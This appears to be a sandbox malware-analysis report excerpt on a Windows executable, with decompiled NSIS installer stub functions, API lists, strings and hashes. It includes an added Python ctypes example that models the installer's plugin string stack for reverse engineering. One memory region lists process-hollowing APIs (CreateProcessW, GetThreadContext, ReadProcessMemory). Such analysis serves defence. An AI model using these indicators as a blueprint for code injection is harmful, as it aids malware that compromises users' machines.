                			E00406492(intOrPtr _a4) {
                				char _v292;
                				int _t10;
                				struct HINSTANCE__* _t14;
                				void* _t16;
                				void* _t21;
                
                				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                				if(_t10 > 0x104) {
                					_t10 = 0;
                				}
                				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                					_t16 = 1;
                				} else {
                					_t16 = 0;
                				}
                				_t5 = _t16 + 0x40a014; // 0x5c
                				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                				return _t14;
                			}

                APIs
                • GetSystemDirectoryA.KERNEL32 ref: 004064A9
                • wsprintfA.USER32 ref: 004064E2
                • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: DirectoryLibraryLoadSystemwsprintf
                • String ID: %s%s.dll$UXTHEME$\
                • API String ID: 2200240437-4240819195
                • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 0228101F: Sleep.KERNELBASE(?,?,034CF0BF), ref: 02281044
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02282050
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.251449636.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                Similarity
                • API ID: CreateFileSleep
                • String ID: 40fbb79f6fda487d8f06db1c793101bd
                • API String ID: 2694422964-1192784401
                • Opcode ID: bbe41873a6fbe4824ddb1bc01cae172123ace91d6be65c8ab8d238b5546e4da5
                • Instruction ID: 666fef6484770b5a02f504520e5a2d10ed57650a39c0397e84b919599295fb4f
                • Opcode Fuzzy Hash: bbe41873a6fbe4824ddb1bc01cae172123ace91d6be65c8ab8d238b5546e4da5
                • Instruction Fuzzy Hash: 6EA2B515A94398A8EB70C7A4BC16BFD63B1AF44B10F2055C7E60CEE1E1D3B51ED49B0A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405CBF(char _a4, intOrPtr _a6, CHAR* _a8) {
                				char _t11;
                				signed int _t12;
                				int _t15;
                				signed int _t17;
                				void* _t20;
                				CHAR* _t21;
                
                				_t21 = _a4;
                				_t20 = 0x64;
                				while(1) {
                					_t11 =  *0x40a3d4; // 0x61736e
                					_t20 = _t20 - 1;
                					_a4 = _t11;
                					_t12 = GetTickCount();
                					_t17 = 0x1a;
                					_a6 = _a6 + _t12 % _t17;
                					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                					if(_t15 != 0) {
                						break;
                					}
                					if(_t20 != 0) {
                						continue;
                					}
                					 *_t21 =  *_t21 & 0x00000000;
                					return _t15;
                				}
                				return _t21;
                			}

                APIs
                • GetTickCount.KERNEL32 ref: 00405CD3
                • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                • nsa, xrefs: 00405CCA
                • "C:\Users\user\Desktop\bGf2H3tXGg.exe" , xrefs: 00405CBF
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: CountFileNameTempTick
                • String ID: "C:\Users\user\Desktop\bGf2H3tXGg.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                • API String ID: 1716503409-3827994080
                • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateProcessW.KERNELBASE(?,00000000), ref: 02280373
                • GetThreadContext.KERNELBASE(?,00010007), ref: 02280396
                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 022803BA
                Memory Dump Source
                • Source File: 00000000.00000002.251449636.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                Similarity
                • API ID: Process$ContextCreateMemoryReadThread
                • String ID:
                • API String ID: 2411489757-0
                • Opcode ID: 5c71018980325046be9aca3b83cd26c889ee106ee3e07fcb318ec7da3c7f197a
                • Instruction ID: 58a0e954ff5c46405c30dec2fa0800306a623c0f089f28ed0dd93257979643d0
                • Opcode Fuzzy Hash: 5c71018980325046be9aca3b83cd26c889ee106ee3e07fcb318ec7da3c7f197a
                • Instruction Fuzzy Hash: 8D322631E61229EEEB20DBE4DC45FADB7B5AF08704F204096E508FA2E0D7749A84DF15
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 60%
                			E0040209D(void* __ebx, void* __eflags) {
                				struct HINSTANCE__* _t18;
                				struct HINSTANCE__* _t26;
                				void* _t27;
                				struct HINSTANCE__* _t30;
                				CHAR* _t32;
                				intOrPtr* _t33;
                				void* _t34;
                
                				_t27 = __ebx;
                				asm("sbb eax, 0x42f4f8");
                				 *(_t34 - 4) = 1;
                				if(__eflags < 0) {
                					_push(0xffffffe7);
                					L15:
                					E00401423();
                					L16:
                					 *0x42f4c8 =  *0x42f4c8 +  *(_t34 - 4);
                					return 0;
                				}
                				_t32 = E00402BCE(0xfffffff0);
                				 *(_t34 + 8) = E00402BCE(1);
                				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                					L3:
                					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                					_t30 = _t18;
                					if(_t30 == _t27) {
                						_push(0xfffffff6);
                						goto L15;
                					}
                					L4:
                					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                					if(_t33 == _t27) {
                						E0040521E(0xfffffff7,  *(_t34 + 8));
                					} else {
                						 *(_t34 - 4) = _t27;
                						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b878, 0x40a000); // executed
                						} else {
                							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                							if( *_t33() != 0) {
                								 *(_t34 - 4) = 1;
                							}
                						}
                					}
                					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004038AA(_t30) != 0) {
                						FreeLibrary(_t30);
                					}
                					goto L16;
                				}
                				_t26 = GetModuleHandleA(_t32); // executed
                				_t30 = _t26;
                				if(_t30 != __ebx) {
                					goto L4;
                				}
                				goto L3;
                			}

                Instruction addresses for the statements above, in order: 0x0040209d 0x0040209d 0x004020a2 0x004020a9 0x00402164 0x004022dd 0x004022dd 0x00402a5a 0x00402a5d 0x00402a69 0x00402a69 0x004020b8 0x004020c2 0x004020c5 0x004020d4 0x004020d8 0x004020de 0x004020e2 0x0040215d 0x00000000 0x0040215d 0x004020e4 0x004020ed 0x004020f1 0x00402135 0x004020f3 0x004020f6 0x004020f9 0x00402129 0x004020fb 0x004020fe 0x00402107 0x00402109 0x00402109 0x00402107 0x004020f9 0x0040213d 0x00402152 0x00402152 0x00000000 0x0040213d 0x004020c8 0x004020ce 0x004020d2 0x00000000 0x00000000 0x00000000

                APIs
                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                  • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00422848,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                  • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00422848,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                  • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422848,7519EA30), ref: 0040527A
                  • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                  • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
                  • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
                  • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA
                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                • String ID:
                • API String ID: 2987980305-0
                • Opcode ID: 7d01c9a26376e903ef8f956939bf13d5e0cf1485282589c35b64df24d5e4481f
                • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                • Opcode Fuzzy Hash: 7d01c9a26376e903ef8f956939bf13d5e0cf1485282589c35b64df24d5e4481f
                • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E004015BB(char __ebx, void* __eflags) {
                				void* _t13;
                				int _t19;
                				char _t21;
                				void* _t22;
                				char _t23;
                				signed char _t24;
                				char _t26;
                				CHAR* _t28;
                				char* _t32;
                				void* _t33;
                
                				_t26 = __ebx;
                				_t28 = E00402BCE(0xfffffff0);
                				_t13 = E00405B28(_t28);
                				_t30 = _t13;
                				if(_t13 != __ebx) {
                					do {
                						_t32 = E00405ABA(_t30, 0x5c);
                						_t21 =  *_t32;
                						 *_t32 = _t26;
                						 *((char*)(_t33 + 0xb)) = _t21;
                						if(_t21 != _t26) {
                							L5:
                							_t22 = E00405761(_t28);
                						} else {
                							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040577E(_t39) == 0) {
                								goto L5;
                							} else {
                								_t22 = E004056E4(_t28); // executed
                							}
                						}
                						if(_t22 != _t26) {
                							if(_t22 != 0xb7) {
                								L9:
                								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                							} else {
                								_t24 = GetFileAttributesA(_t28); // executed
                								if((_t24 & 0x00000010) == 0) {
                									goto L9;
                								}
                							}
                						}
                						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                						 *_t32 = _t23;
                						_t30 = _t32 + 1;
                					} while (_t23 != _t26);
                				}
                				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                					_push(0xfffffff5);
                					E00401423();
                				} else {
                					E00401423(0xffffffe6);
                					E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t28);
                					_t19 = SetCurrentDirectoryA(_t28); // executed
                					if(_t19 == 0) {
                						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                					}
                				}
                				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t33 - 4));
                				return 0;
                			}

                Instruction addresses for the statements above, in order: 0x004015bb 0x004015c2 0x004015c5 0x004015ca 0x004015ce 0x004015d0 0x004015d8 0x004015da 0x004015dc 0x004015e0 0x004015e3 0x004015fb 0x004015fc 0x004015e5 0x004015e5 0x004015e8 0x00000000 0x004015f3 0x004015f4 0x004015f4 0x004015e8 0x00401603 0x0040160a 0x00401617 0x00401617 0x0040160c 0x0040160d 0x00401615 0x00000000 0x00000000 0x00401615 0x0040160a 0x0040161a 0x0040161d 0x0040161f 0x00401620 0x004015d0 0x00401627 0x00401652 0x004022dd 0x00401629 0x0040162b 0x00401636 0x0040163c 0x00401644 0x0040164a 0x0040164a 0x00401644 0x00402a5d 0x00402a69

                APIs
                  • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                  • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                  • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                  • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                Strings
                • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 1892508949-1943935188
                • Opcode ID: f83e9c126ec5e5627e04690920b1fc6d95bfd0f8b27b2dc86f60bbb393f00223
                • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                • Opcode Fuzzy Hash: f83e9c126ec5e5627e04690920b1fc6d95bfd0f8b27b2dc86f60bbb393f00223
                • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00401B87(void* __ebx, void* __edx) {
                				intOrPtr _t7;
                				void* _t8;
                				void _t11;
                				void* _t13;
                				void* _t21;
                				void* _t24;
                				void* _t30;
                				void* _t33;
                				void* _t34;
                				char* _t36;
                				void* _t37;
                
                				_t27 = __ebx;
                				_t7 =  *((intOrPtr*)(_t37 - 0x20));
                				_t30 =  *0x40b878; // 0x0
                				if(_t7 == __ebx) {
                					if(__edx == __ebx) {
                						_t8 = GlobalAlloc(0x40, 0x404); // executed
                						_t34 = _t8;
                						_t4 = _t34 + 4; // 0x4
                						E0040618A(__ebx, _t30, _t34, _t4,  *((intOrPtr*)(_t37 - 0x28)));
                						_t11 =  *0x40b878; // 0x0
                						 *_t34 = _t11;
                						 *0x40b878 = _t34;
                					} else {
                						if(_t30 == __ebx) {
                							 *((intOrPtr*)(_t37 - 4)) = 1;
                						} else {
                							_t2 = _t30 + 4; // 0x4
                							E004060F7(_t33, _t2);
                							_push(_t30);
                							 *0x40b878 =  *_t30;
                							GlobalFree();
                						}
                					}
                					goto L15;
                				} else {
                					while(1) {
                						_t7 = _t7 - 1;
                						if(_t30 == _t27) {
                							break;
                						}
                						_t30 =  *_t30;
                						if(_t7 != _t27) {
                							continue;
                						} else {
                							if(_t30 == _t27) {
                								break;
                							} else {
                								_t32 = _t30 + 4;
                								_t36 = "Cgrlcpdlsle";
                								E004060F7(_t36, _t30 + 4);
                								_t21 =  *0x40b878; // 0x0
                								E004060F7(_t32, _t21 + 4);
                								_t24 =  *0x40b878; // 0x0
                								_push(_t36);
                								_push(_t24 + 4);
                								E004060F7();
                								L15:
                								 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t37 - 4));
                								_t13 = 0;
                							}
                						}
                						goto L17;
                					}
                					_push(0x200010);
                					_push(E0040618A(_t27, _t30, _t33, _t27, 0xffffffe8));
                					E00405813();
                					_t13 = 0x7fffffff;
                				}
                				L17:
                				return _t13;
                			}

                Instruction addresses for the statements above, in order: 0x00401b87 0x00401b87 0x00401b8a 0x00401b92 0x00401bda 0x00401c08 0x00401c11 0x00401c13 0x00401c17 0x00401c1c 0x00401c21 0x00401c23 0x00401bdc 0x00401bde 0x004027bf 0x00401be4 0x00401be4 0x00401be9 0x00401bf0 0x00401bf1 0x00401bf6 0x00401bf6 0x00401bde 0x00000000 0x00401b94 0x00401b94 0x00401b94 0x00401b97 0x00000000 0x00000000 0x00401b9d 0x00401ba1 0x00000000 0x00401ba3 0x00401ba5 0x00000000 0x00401bab 0x00401bab 0x00401bae 0x00401bb5 0x00401bba 0x00401bc4 0x00401bc9 0x00401bce 0x00401bd2 0x00402918 0x00402a5a 0x00402a5d 0x00402a63 0x00402a63 0x00401ba5 0x00000000 0x00401ba1 0x00402374 0x00402381 0x00402382 0x00402387 0x00402387 0x00402a65 0x00402a69

                APIs
                • GlobalFree.KERNEL32 ref: 00401BF6
                • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401C08
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: Global$AllocFree
                • String ID: Cgrlcpdlsle
                • API String ID: 3394109436-1075718742
                • Opcode ID: 401988b6dd0437a3d7756572422dd002b5d5607acde73d1ce5ab64801902719a
                • Instruction ID: e4cc8bcb7752a4f6b3811e2611bd1e0fa57f8e281b648bd21e3e74c9503b19de
                • Opcode Fuzzy Hash: 401988b6dd0437a3d7756572422dd002b5d5607acde73d1ce5ab64801902719a
                • Instruction Fuzzy Hash: 74219673644101EBDB20EB65DE88E5E73E8EB44318711413BF602B72D1DB78D8529B5D
                Uniqueness

                Uniqueness Score: -1.00%
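
                Two of the functions above fit together. E0040209D loads a DLL, resolves an export with GetProcAddress and calls it with five arguments (a window handle, 0x400, 0x430000, 0x40b878, 0x40a000), and E00401B87 keeps a linked list headed at 0x40b878 whose nodes are GlobalAlloc'd with size 0x404, the link in the first dword and the string at +4. Those values match the NSIS installer plugin convention: a string size of 1024, a stack node of {next, text[1024]} and plugin exports taking (hwndParent, string_size, variables, stacktop, extra). Together with the "nsa" temp-file prefix and the GetTempFileName/GetTickCount calls listed earlier this is an inference from the decompiled values, not something the report states. The following added example, which is not code from the report, the sample or the NSIS project, models that stack and call convention with ctypes so the push/pop/call sequence can be stepped through on any platform; the plugin body, the function names and the 64-bit node size are hypothetical, and the real stub uses GlobalAlloc/GlobalFree where the example keeps a Python list.

```python
import ctypes

# Constants taken from the decompiled stub: the string_size argument 0x400 at
# 0x00402107 and the GlobalAlloc(GMEM_ZEROINIT, 0x404) node size at 0x00401c08.
NSIS_MAX_STRLEN = 0x400
NODE_SIZE_32BIT = 0x404


class StackEntry(ctypes.Structure):
    """One node of the installer's string stack: a 'next' link followed by
    string_size bytes of text (text lives at node+4 in the 32-bit sample,
    which is why the stub reads and writes `_t30 + 4`)."""


StackEntry._fields_ = [
    ("next", ctypes.POINTER(StackEntry)),
    ("text", ctypes.c_char * NSIS_MAX_STRLEN),
]

# stack_t **: the plugin receives a pointer to the stub's global head pointer
# (0x40b878 in the sample) so that it can pop its arguments and push results.
StackHead = ctypes.POINTER(ctypes.POINTER(StackEntry))

# Assumed plugin export signature (hypothetical here; it matches the five
# arguments pushed before the indirect call at 0x00402107):
#   void entry(HWND hwndParent, int string_size, char *variables,
#              stack_t **stacktop, void *extra)
PluginEntry = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_int,
                               ctypes.c_char_p, StackHead, ctypes.c_void_p)

_alive = []  # keeps nodes alive; the real stub GlobalAlloc/GlobalFrees them


def node_size_for_pointer_width(pointer_bytes: int) -> int:
    """Size of one stack node for a given pointer width: 4 + 0x400 = 0x404
    on the 32-bit sample, exactly the GlobalAlloc size in E00401B87."""
    return pointer_bytes + NSIS_MAX_STRLEN


def stack_push(stacktop, text: bytes) -> None:
    """Link a new node in front of *stacktop (the GlobalAlloc branch of
    E00401B87, i.e. a Push)."""
    node = StackEntry()
    node.text = text[:NSIS_MAX_STRLEN - 1]  # truncated as lstrcpyn would
    node.next = stacktop[0]
    _alive.append(node)
    stacktop[0] = ctypes.pointer(node)


def stack_pop(stacktop):
    """Unlink the top node and return its text (the GlobalFree branch of
    E00401B87, i.e. a Pop); None when the stack is empty."""
    head = stacktop[0]
    if not head:
        return None
    node = head.contents
    text = node.text
    stacktop[0] = node.next
    return text


@PluginEntry
def demo_plugin(hwnd, string_size, variables, stacktop, extra):
    """Hypothetical stand-in for a plugin export: pops its one argument and
    pushes a result string for the installer script to Pop."""
    arg = stack_pop(stacktop)
    stack_push(stacktop, b"plugin saw: " + (arg or b"<empty>"))


def call_plugin_like_stub(entry, args):
    """Mimic the stub: push the arguments, make the five-argument call, and
    return the strings the plugin left on the stack, top first."""
    head = ctypes.POINTER(StackEntry)()      # NULL head: empty stack
    stacktop = ctypes.pointer(head)
    for a in reversed(args):                 # first argument ends up on top
        stack_push(stacktop, a)
    entry(None, NSIS_MAX_STRLEN, b"", stacktop, None)
    out = []
    while True:
        s = stack_pop(stacktop)
        if s is None:
            return out
        out.append(s)
```

                When reversing a stub like this one, the practical use is knowing that the string a plugin export consumes is at `*(*stacktop) + 4` and that the result it leaves for the script is the node linked in at the head afterwards, so a breakpoint on the indirect call at 0x00402107 with a watch on 0x40b878 shows both the arguments and the returned strings.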

                C-Code - Quality: 59%
                			E00401389(signed int _a4) {
                				intOrPtr* _t6;
                				void* _t8;
                				void* _t10;
                				signed int _t11;
                				void* _t12;
                				signed int _t16;
                				signed int _t17;
                				void* _t18;
                
                				_t17 = _a4;
                				while(_t17 >= 0) {
                					_t6 = _t17 * 0x1c +  *0x42f470;
                					if( *_t6 == 1) {
                						break;
                					}
                					_push(_t6); // executed
                					_t8 = E00401434(); // executed
                					if(_t8 == 0x7fffffff) {
                						return 0x7fffffff;
                					}
                					_t10 = E0040136D(_t8);
                					if(_t10 != 0) {
                						_t11 = _t10 - 1;
                						_t16 = _t17;
                						_t17 = _t11;
                						_t12 = _t11 - _t16;
                					} else {
                						_t12 = _t10 + 1;
                						_t17 = _t17 + 1;
                					}
                					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                						 *0x42ec0c =  *0x42ec0c + _t12;
                						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec0c, 0x7530,  *0x42ebf4), 0);
                					}
                				}
                				return 0;
                			}

                Instruction addresses for the statements above, in order: 0x0040138a 0x004013fa 0x0040139b 0x004013a0 0x00000000 0x00000000 0x004013a2 0x004013a3 0x004013ad 0x00000000 0x00401404 0x004013b0 0x004013b7 0x004013bd 0x004013be 0x004013c0 0x004013c2 0x004013b9 0x004013b9 0x004013ba 0x004013ba 0x004013c9 0x004013cb 0x004013f4 0x004013f4 0x004013c9 0x00000000

                APIs
                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                • SendMessageA.USER32 ref: 004013F4
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00406500(signed int _a4) {
                				struct HINSTANCE__* _t5;
                				signed int _t10;
                
                				_t10 = _a4 << 3;
                				_t8 =  *(_t10 + 0x40a240);
                				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
                				if(_t5 != 0) {
                					L2:
                					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
                				}
                				_t5 = E00406492(_t8); // executed
                				if(_t5 == 0) {
                					return 0;
                				}
                				goto L2;
                			}

                Instruction addresses for the statements above, in order: 0x00406508 0x0040650b 0x00406512 0x0040651a 0x00406526 0x00000000 0x0040652d 0x0040651d 0x00406524 0x00000000 0x00406535 0x00000000

                APIs
                • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                  • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32 ref: 004064A9
                  • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                  • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp
                Similarity
                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                • String ID:
                • API String ID: 2547128583-0
                • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
